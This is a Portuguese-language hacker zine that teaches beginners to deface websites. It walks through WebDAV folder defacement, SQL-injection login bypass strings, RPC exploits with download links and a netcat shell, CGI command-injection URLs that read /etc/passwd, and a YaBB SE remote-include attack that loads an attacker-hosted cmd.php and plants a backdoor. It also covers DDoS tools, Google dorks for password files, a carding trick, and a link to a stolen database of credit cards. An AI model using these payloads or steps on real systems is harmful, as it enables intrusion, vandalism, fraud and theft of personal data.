Entendendo ZINE e Fazendo sua propria

ESSA ZINE É PRIVATE, NÃO DISTRIBUA!!!!!PRIV8 = DO NOT DISTRIBUTE

# ###### # # ###### # # # # # # # # # # # # # # # Os últimos suspiros de um nick que só # ###### # # ###### # # # # me deu alegria aheuaheua. # # # # # # # # # # # # # # # # # # # # # # ##### # # # # # ###### ###### # r0x a lot
Texto: D1C45 Autor: The_Perfect
Introdução--------------------------------------The PerfectPDW ------------------------------------------- The perfectproxy-------------------------------------------The perfectSQL Injection ----------------------------------The perfectRPC --------------------------------------------The perfectPHPwebsite--------------------------------------The perfectdDos--------------------------------------------The perfectNetbios ----------------------------------------The perfectCGI --------------------------------------------The perfecrYABBSE.php--------------------------------------The perfectBug para carders--------------------------------Hualdo (Shadow Boys)Usando o Google como scanner--------------------Hualdo (Shadow Boys)Banco de dados----------------------------------The perfect, Hualdo (Shadow Boys)
################# #INTRODUÇÃO (UI)# #################
Muito bem, se você decidiu ler essa zine é porque acha que tem mais a aprender, e isso é bom.
/////// // X X // > Porra, o cara ja tá traçando a / \__~/ Emmanuele!!! ///// (\ \) (~) // o ( \ \ / / // > ( \ \/ /____________/ \__O ( \__/ _____\// / /( / / ______)/ ( // \ \ / / ( ) \ () \ \O/ ` \ ) ) ) ) / / ( _ / /_ (____> (____> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Para entender essa zine você deve ter noção de IP (uehauea falano assim é até engraçado mas esse texto é beeeeeeeem básico), um pouco de DOS e linux e principalmente, ESQUEÇA DE UMA VEZ POR TODAS ESSE NEGOCIO DE INVADIR COMPUTADORES PESSOAIS, estamos falando de servidores http.O que é um deface? Ato de desfigurar sites da web em diversas plataformas, substituindo a index do site pela que você desejar, normalmente inserindo nela algum protesto e seu nick. Se você não tem um nick, sugiro que crie um, pois seu nick é a sua identidade no mundo defacer.
_ ,-. / ) ( `. // /-._/ / Bom, agora vamos ao que interessa!!! `\ \ /(_/ / / / ______________________________________ ; `-` (_/ / / (_/ / Racionais Mc´s lançam seu novo CD, Nada como um dia após o outro, depois de \ Sobrevivendo no Inferno!!!!!!!!!!!! ) /` / / $$$$$$$$$
Primeiro bug que o titio The_perfect vai ensinar:Bom, como em todas as zines que eu ja vi até hoje, o primeiro bug a ser ensinado é o clássico PDW

######## # PDW # ########

nuss, a Emmanuele ta com 2 cara!!!
PDW = PASTAS DA WEBALVO = IIS 4.0 on Windows NT4, Windows 2000, Windows XP, Windows 2003 ServerNota = Iniciante
Bom, quando eu aprendi esse bug ele era tido como um bug desprezivel, já que é facílimo de ser explorado e muito antigo. Os caras que se acham "elite" não usam esse bug, mas ele tem catado muito antigamente, pois, ao contrario do que os elite de merda esperavam, o bug está presente nos windows novos e nos IIS (Internet Information Server) 4, 5 e 6.0Para explorar esse bug, você precisa de um scanner, eu sugiro o Arplhmd Group Exploit, que pode ser encontrado em http://www.arplhmd.zor.org (lá vc ve como funciona)Após achar o site vulneravel, você vai no mirc e digita: /dns ip-do-site, para ver qual é o endereço do site, tipo, www.site.comDaí voce vai em iniciar, executar e joga essa string: %WINDIR%\EXPLORER.EXE ,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{BDEADF00-C265-11d0-BCED-00A0C90AB50F}
Pronto, vai abrir uma janela. Nessa janela vc coloca nova pasta da web e coloca o endereço do site que voce pegou com o scanner.Vai aparecer uma pastinha com o nome do site, daí vc entra nela e altera a index ou default, à carater do servidor.Pronto, agora coloca sua index e sai por aí gritando que você é hacker...

######### # Proxy # __ #########

Para explorar algumas falhas, usamos 0 navegador. Porem, seu IP pode ficar logado no sistema...Nossa, e agora??? Calma...Tipo, para que nosso IP não seja descoberto e a festa não acabe, vamos usar um proxy.Nossa, um PROXY!!!! maaaaaaeee, agora eu sei o que um proxy...hehehehe O que é um proxy?É um computador, um servidor à longa distancia normalmente que permite que você se conecte a ele primeiro e ele se conecta ao site, ou seja, nesse site ficará logado o IP do proxy e não o seu, sacou?? Vixi, agora eu so o SR. anonimo!!!Calma, tb naum é assim, voce tem que procurar um proxy que te deixe totalmente anônimo, pelo contrario voce pode ser pego e seu pai te deixa de castigo um mês (ou fodem vc na cadeia).Vc vai em propriedades do navegador (IE), conexões e seleciona Configurações da LAN. Aí vc procura proxy e coloca o ip do proxy que você arranjou.Depois você entra na net, tipo, normalmente quando tá mais lento é pq funcionou, mas naum vamos arriscar, entre em algum site que você conhece que mostra seu IP e faça o teste.Se aparecer o IP do proxy, é isso ae, mãos a obra.Mas The_Perfect, como eu procuro proxys???Não precisa procurar,eu sei onde tem muiiiiitos
http://www.samair.ru/proxy/ (isso vale ouro galera)
vai la...pode falar, eu so lind0!!Tipo, eu naum uso proxy, mas tipo, você usa se quiser, eu recomendo apenas para invadir sites brasileiros e tal, gringo nem dá nada.

################# # SQL Injection # (basicão) #################

ALVO: IIS 5.0 (Ruindows 2000)Nota: Iniciante-medio
Esse bug é muito legal hehuaehuaeVoce vai encontrar vários sites bugados, mas não vai conseguir ownar (possuir, usado para designar um deface) todos. Essa falha consiste em injetar comandos no banco de dados SQL obtendo privilegios de administrador.Para procurar um site vulneravel usaremos o Google (nossa, o Google??) é, isso mesmo.O diretório onde você vai injetar a string é:
/admin/index.asp/admin/default.asp
tb tem esses:/admin/adm/admin/index.asp /admin/default.asp/admin/admin.asp/admin/login.asp/admin/
entrar.asp/admin/default.asp/admin/index.asp/admin/login.asp/admin/password.asp/admin/senha.asp/login/
login.asp/adm/login.asp/adm/index.asp/adm/default.asp/admin/site/entrar.asp/ecommerce/admin/index.asp/
ecommerce/admin/default.asp/ecommerce/admin/login.asp
Existem outros mas nunca funcionou comigo... Tipo, vc vai no Google e procura por sites vulneraveis, assim: allinurl: "/admin/index.asp" ou "/admin/index.asp.Quando você achar o site vulnerável, você vai inserir a string. Deverá aparecer um campo para login e senha, daí vc coloca:
login: 'or'1 ou 'or''='senha: 'or'1 ou 'or''='
' or ' 1' or '1'='1' or 1=1--'or''='' or 'a'='a') or ('a'='a
Daí se o site estiver vulnerável você vai cair no diretório do admin, aí você procura o caminho da index e owna o site! Tipo, você tb pode faze otras coisas do tipo criar um user pra vc e etc.
Hey sandro, vc manda melhor???

####### # RPC # #######

Vários cara me pediram para não publicar tutoriais sobre esse bug, mas alguns motivos me levaram a publicar:
1- No mundo deface esse bug jé é muito conhecido;2- Todos tem direito à informação.3- Eu so bonzinho =)
RPC = Remote Procedure Call (Chamada de procedimento remoto)ALVO = Windows NT4, Win 2000, Win XP, WIn 2003 ServerNota: Good
Tipo, quem não ler isso com atenção e não buscar mais informações não vai conseguir ownar por esse bug, pq ele exige um pouco mais de atenção.O exploit usa a porta 135, então qdo vc ver algum micro com essa porta aberta vc ja fica atento...Vc pode usar o mesmo scanner que o de pdw mas com um script diferente para usar esta falha. O legal do RPC é que ele não pega apenas servidores mas tambem personal computers (mas lembre o que eu disse sobre invadir os outros)Após achar os IP´s vulneráveis, voce faz o seguinte:baixe os exploits para RPC:
http://www.facef.br/dc.ziphttp://www.facef.br/dc3.zip
Agora baixe o netcat, que será usado para conectar você ao computador explorado:
http://www.facef.br/nc.zip
Copie rápido os exploits, esse site eu invadi a um temp atras e uso ele como se fosse meu ftp auheuaha, copia rapido pq pode sair do ar.
Vixi, que lindo, agora você já tem tudo em mãos, vamos à prática:

***A EMMANUELE TÁ CAVALGANDO NO NEGÃOZINHO...***

Você vai entra no prompt do dos, ir até a pasta onde vc colocou os exploits e digitar o nome do exploit. Você verá que vão aparecer várias targets, daí vc escolhe a target correspondente ao sistema a ser explorado e manda bala.Se aparecer "Use the netcat to conect to server", aí que você vai usar o netcat, da seguinte forma:nc ip 44444444 é a porta que o exploit abre pra vc entrarVixi, que legau, o exploit abre uma porta pra mim???dãhhhh, no comments =se der certo, vc vai cair em C:/windows/system32se der errado, naum acontece nadaTipo, vc vai demorar um pouco pra achar computadores vulneraveis mas paciencia, vida de rhacker é dificil...EEEEEEEEEEEEEEEEEEEEEEEE, agora eu sei RPC !!!!maaaaaaaaaaee, eu so hacker agora, num conta pra ninguem!!!!

############### # PHP Website # ###############

Ohhhhhhhh, agora vamos aprender PHP Website!!!
ALVO: Linux (vixi)Nota: sUx
Tipo, essa falha é babaca, mas pra quem quiser aprende vai aí a dica:Use o Arplhmd Group Exploit que ele faz tudo pra vc :*Após achar o site vulneravel, com o mesmo scanner, voce faz o seguinte:coloca lá: www.site.com/setup (substitua o site.com pelo site vulnerável)Agora vc está no setup do site, faça o que quiser, primero crie um usuario pa vc depois entre como admin e detona tudo(PS: nunca usei isso)*Meu deus, agora eu sei hackear linux... maaaaaaaaaaaaaaeeee*
. TA COMEÇANDO OTRO FILME DA EMMANUELE!!!!!! . \./ \./ . \./ . \^.\ \\.// /.^/ \--.\ \\.// /.--/ \--. \ \\.// / .--/ \---.\ \./ /.---/ \--.\ \./ /.--/ \ .\ . /. / _ -_^_^_^_- \ \\ // / -_^_^_^_-_ - -/_/_/- ^ ^ ^ ^ -\_\_\- -

######## # dDoS # O Perfume de Emmanuele ########

Bom.. vou falar sobre DDoS (Distributed Denial of Service). Traduzindo ficaria Negação de Serviço Distribuída. Pela tradução você já tem uma idéia do que significa. Mas, mesmo se assim você não entendeu, significa fazer com que uma determinada máquina na rede pare de responder à requisições, ou seja, os usuários legítimos dela não irão utilizar seus serviços, enquanto o ataque DDoS se suceder. Esse foi um ataque bastante utilizado nos sites mais visitados do mundo, como Yahoo, Altavista, Amazon.com, etc. Note que esses sites ficaram indisponíveis durante horas e horas. Aqui no Brasil também houveram e ainda há ataques DDoS. Sites como Cade?, Zipmail, UOL, entre outros foram atacados. O ataque DDoS consiste em enviar um grande número de requisições à umadeterminada máquina. Esta vai tentar responder. Até que no começo ela provavelmente irá conseguir responder às requisições. Mas se as requisições forem contínuas, vai ter um momento em que a máquina não terá capacidade para respondê-las e assim vai deixar de responder a qualquer outra máquina que a requisite. O objetivo foi realizado! Ninguém agora consegue visualizar sequer uma html do seu site... nada!É como se a máquina estivesse desligada. Vou mostrar graficamente mais ou menos como funciona um ataque:
____________ _____ Largura de _ banda alta ---- /__________ / ___ ALVO / ________ / / ____________ _____ ____________ _____ <-- / Largura Server ___ /____________ de _ <-- VOCÊ _ \ banda alta --------- \ __________ __________ \ ___ _________ \ \ \ ____________ _____ \ Largura de _ banda alta ---- __________ ___
Nota: As máquinas de largura de banda alta são mais eficientes, mas computadores pessoais podem ser usados também.
Você deve ter perguntando antes: mas como fazer grandes números de requisições?? Simples... para isso usamos outros computadores (o que deuma certa forma nos protege, se atacássemos diretamente dos nossos seríamos descobertos rapidamente). Em um ataque DDoS usamos muitos computadores. Sevocê não quiser usar tantos computadores assim, podepraticar o ataque usando computadores de largura de banda alta, geralmente encontrados nas Universidades americanas. Desse modo será preciso poucos computadores, já que eles têm enorme poder de ataque. Algumas chegavam a ter uma largura de banda de 200 MB... você tem idéiado que significa isso? Bom.. vamos ao que interessa... O ataque funcionadessa forma: você envia um pacote à essas máquinas, elas "entendem" quedevem requisitar intermitentemente o servidor, que será o alvo. Assim,o alvo não suportará as requisições e ficará indisponibilizado. As máquinas que você deve usar para suceder o ataque devem estar infectadas com um servidor de serviço. Ou seja, você eve infectá-las, ou conseguir ips de algumas com algum amigo. Eu não estou colocando ips à disposição, pois voce vai fazer merda auauehuae. Os programas mais usados para ataques são: TFN (Tribe Flood Network), TFN2k, trin00, e agora um mais poderoso, que age em conjunto com esses: o mstream. Você pode encontrar ferramentas para praticar um ataque em: http://www.ussrback.com/distributed.htm
(PS: O desenho foi copiado de um site em inglês.) =]
~ _ ~ A Emmanuele deu até a (@#$%¨&*) fazer bico ~ ,----`-, - ) / ,--. /_/ > ) ,\__-' \ \_ \ ~~-___ ) \ \ %%%%%%%

########### # NetBios # ###########

Aee, decidi falar um pouco sobre isso que não é uma falha nem nada, tipo, não se cata servidores e nem faz-se deface. Eu coloquei isso aqui para que você possa ter uma idéia do que é e explorar esse "descuido" das pessoas. Eu acho pelomenos umas 80 máquinas vulneráveis com isso, server para você ter acesso ao computador remoto e ler as informações mais sigilosas, inserir trojans, enfim, fazer uma diversidade de coisas, isso vai da criatividade de cada um. Muitos podem me criticar por expor isso assim dessa maneira, outros podem me achar babaca, mas eu não to nem fudendo com isso não, tipo, quem achar ruim que faça melhor...Seguinte:Muitas pessoas utilizam o compartilhamento de rede do Windows, as chamadad redes Microsoft.A maioria delas, compartilha o diretorio c: inteirinho e NÃO coloca senha, naum me pergunte porque... o povo é burro memo mas essa é otra historia hehehehe.Daí você vai usar um programa milagroso chamado R3X. A maioria dos lammers tem mas não sabem como usar... é foda neh... Tipo, no site tem um tutorial de como usar esse programa, como eu naum so papai noel, vc lê o tuto e depois se tiver alguma dúvida me procura que eu esclareço...Achando ips vulneraveis ( cara isso é mtttto facil e pega mttttto) você vai no seu navegador e coloca:\\iptipo:\\192.168.0.1daí se não pedir senha, mete bronca, c:/ interinho na sua mão ou a pasta que o pato tiver compartilhado.Não há muito o que comentar sobre isso, ae, pros elite que tem fama de hacker na cidade mas só entram por compartilhamento, sinto mto mas vão ter que descobrir otra coisa uheuaheuaheua.O R3X vc acha em:http://www.invasao.com.brmete bronca =) ######## # CGI # Porra, to de saco cheio de digitar =/ ########
Exploit local root: www.bundadimel.hpg.com.br/mremap_pte
the_perfect, como que eu faço pra ownar por CGI??? cara, eu vo te falar, mas vc naum vai sair espalhando? Claro que não, pode confiar blz, to confiando hein...
Bom pra começar vc precisa de um scaner que vc ja tem, ele scaneia essa vulnerabilidade.
Então vamos ao q interessa vul de CGI é STRINGS q é um comando q vc taka assim www.site.com/strings=COMANDOS LINUX e é isso CGI...
/cgi-bin/common/listrec.pl?APP=qmh-news&TEMPLATE=;ls
/cgi-bin/eshop.pl?seite=;ls
/scripts/calendar/calender.pl?config=cat%20/etc/passwd
/cgi-bin/directory.php?dir=%3Bcat%20/etc/passwd
/cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=/bin/id
/cgi-bin/mailman/mailmanager.pl?setupfile=demo&page=/bin/ls
/cgi-bin/mailmanager.pl?setupfile=demo&page=/bin/ls
http://www.victim.com/cgi-bin/bb-hist.sh?HISTFILE=/home/*
mas a q funciona mais no momento q é a vuln do scaner é a seguinte:
www.vulhost.com/arquivobugado.cgi?file=uname+-a;id
Tipo, pra explorar essas vulnerabilidades você tem que ter um mínimo conhecimento de Linux, tipo, isso vc vai atrás,acha em qualquer site sobre linux e como eu ja disse, não so papai noel...

############ #YABBSE.PHP# ############

__________________________ Falae, a zine ta ajudando hein??? ---------------------------
Tipo, só pra reforçar, o Arplhmd tem varios scripts, ou seja, ele é capaz de scanear em várias falhas, tipo, basta vc baixar o script de scan, por isso eu naum vo entrar em detalhes...
Após achar o site vulnerável, vc joga a seguinte string:
www.site.com/yabbse/Sources/Packages.php?sourcedir=www.SEUSITE.com.br/cmd.php?cmd=COMANDOS DE LINUX
Em lugar de www.SEUSITE.com.br/cmd.php você deve indicar um site onde tenha um cmd em php, isso va acha na net mas qualquer coisa eu ajudo tb.
Sacou???Nossa Java, mas aí eu tenho acesso ao sistema??? daí eu sugiro que você jogue um backdoor em /tmp (pasta onde você tem permissão pra executar arquivos no Linux) , execute o backdoor e entre por telnet ou até mesmo netcat.procure o backdoor telnetd já compilado, ae, naum tenho o endereço,mas qualquer coisa me dá um toque que eu discolo.Tipo, eu duvido que alguem que tá lendo owne por essa falha, mas tipo, se conseguir eu pago um X-tudo no komilão. =D.

#################### # Bug para Carders # ####################

[] [] [] [] [] [] [] [] [] [] [] [] [] [] []==============Carder - cartmanager================[] [] [] [] [] [] [] [] [] [] [] [] [] [] []-----------------------------------------------------------------Esses tutorias de Carder que irei publicar serão bem simples.------------------------------------------------------------------> Procurando sites bugados

O modo mais simples certamente é o Google(www.google.com) mas sevocê sabe bem de alguma linguagem de programação recomendo que façaseus próprios scans ;)Para achar sites bugados com essa falha v´no Google e digite:allinurl: cart.cgi ouallinurl: cartmanager.cgi------------------------------------------------------------------> Explorando
Modifique o site :
Exemplo: www.a1ts.com.br
.Modifique por
Exemplo: www.a1ts.com.br/cgi-bin/Admin_files/ -----------------------------------------------------------------Ps. Nunca se esquece que os MDBs e os scripts podem variar de diretorio ;) Esse txt é para aprendizado não me responsabilizo pelo que você vier a fazer.

######################### #Usando Google como scan# #########################

Realmente o google e muito util pois com alguns comandos (strings) voce podera achar coisas incriveis e muito uteis.
Alguns exemplos abaixo
allintitle: "index of/root" O google e muito util pois podera dar alguns resultados muito satisfatorios com comandos (strings)
inurl:usuarios.mdb inurl:users.mdb inurl:site.ini inurl:password.mdb inurl:orders.log
"Index of /admin" "Index of /password" "Index of /mail" "Index of /" +passwd "Index of /" +password.txt "Index of /" +.htaccess index of ftp +.mdb allinurl:/cgi-bin/ +mailto
administrators.pwd.index authors.pwd.index service.pwd.index filetype:config web gobal.asax index
allintitle: "index of/admin" allintitle: "index of/root" allintitle: sensitive filetype:doc allintitle: restricted filetype :mail allintitle: restricted filetype:doc site:gov
inurl:passwd filetype:txt inurl:admin filetype:db inurl:iisadmin inurl:"auth_user_file.txt" inurl:"wwwroot/*."
top secret site:mil confidential site:mil
allinurl: winnt/system32/ (get cmd.exe) allinurl:/bash_history
intitle:"Index of" .sh_history intitle:"Index of" .bash_history intitle:"index of" passwd intitle:"index of" people.lst intitle:"index of" pwd.db intitle:"index of" etc/shadow intitle:"index of" spwd intitle:"index of" master.passwd intitle:"index of" htpasswd intitle:"index of" members OR accounts intitle:"index of" user_carts OR user_cart

################## # Banco de dados # ##################

Lembrando: USE PROXY PELAMORDIDEUS!!!!!!
Tipo, esse banco de dados foi disponibilizado pelo nosso amigo Hualdo do grupo Shadow Boys, eu não tenho nenhum envolvimento com isso, apenas estou publicando para que voce possa entender como fuinciona o mecanismo, tipo, se você fizer merda você mesmo q vai se ferrar...Trata-se de um banco de dados com informações pessoais, incluindo cartões de crédito e senha portanto, se voce naum tiver juizo nem clique no endereço. by The_perfect
http://www27.brinkster.com/hualdoath/dados/menu_meio2.zip
__________________________________________________________________________________________________
AHHHH JAVA, JÁ ACABOU A ZINE???
Logico, pq ja acabou minha paciencia... TIPO, APOSTO QUE DEPOIS DA PUBLICAÇÃO DESSA ZINE NUMA CIDADEZINHA PORCA COMO GUAXUPÉ, VÃO APARECER ALTOS HACKERS AÍ DIZENDO QUE INVADEM TUDO E SÃO OS FODAS... TIPO, EU JA DISSE E REPITO, NÃO MECHO MAIS COM INVASÃO E ESTOU MUITO FELIZ ASSIM, E QUERIA DEIXAR BEM CLARO QUE , SEM QUERER ME EXIBIR, NÃO COLOQUEI NEM 10% DO QUE SEI SOBRE O ASSUNTO NESSE TEXTO.Ae, pros hackers fodões, tipo, se vcs são tão bons, nem precisam ler essa zine.Dae, TO LIGADO QUE VARIOS CARA VÃO LER ISSO E SAIR DIZENDO POR AÍ: o The Perfect é um bosta, eu manjo muito mais que ele auehuaheuaheuauheuae.... tipo, podecre, agora q ja leram o q EU escrevi eu so um bosta...
BOM PESSOAL, TEM MUIIIIITO MAIS, MAS DEXA PRA PRÓXIMA ZINE!!qualquer crítica,guarde pra voce...
PS: os desenhos foram feitos por uns mano meu...
The perfect =/ ah, Emmanuele foi presa =(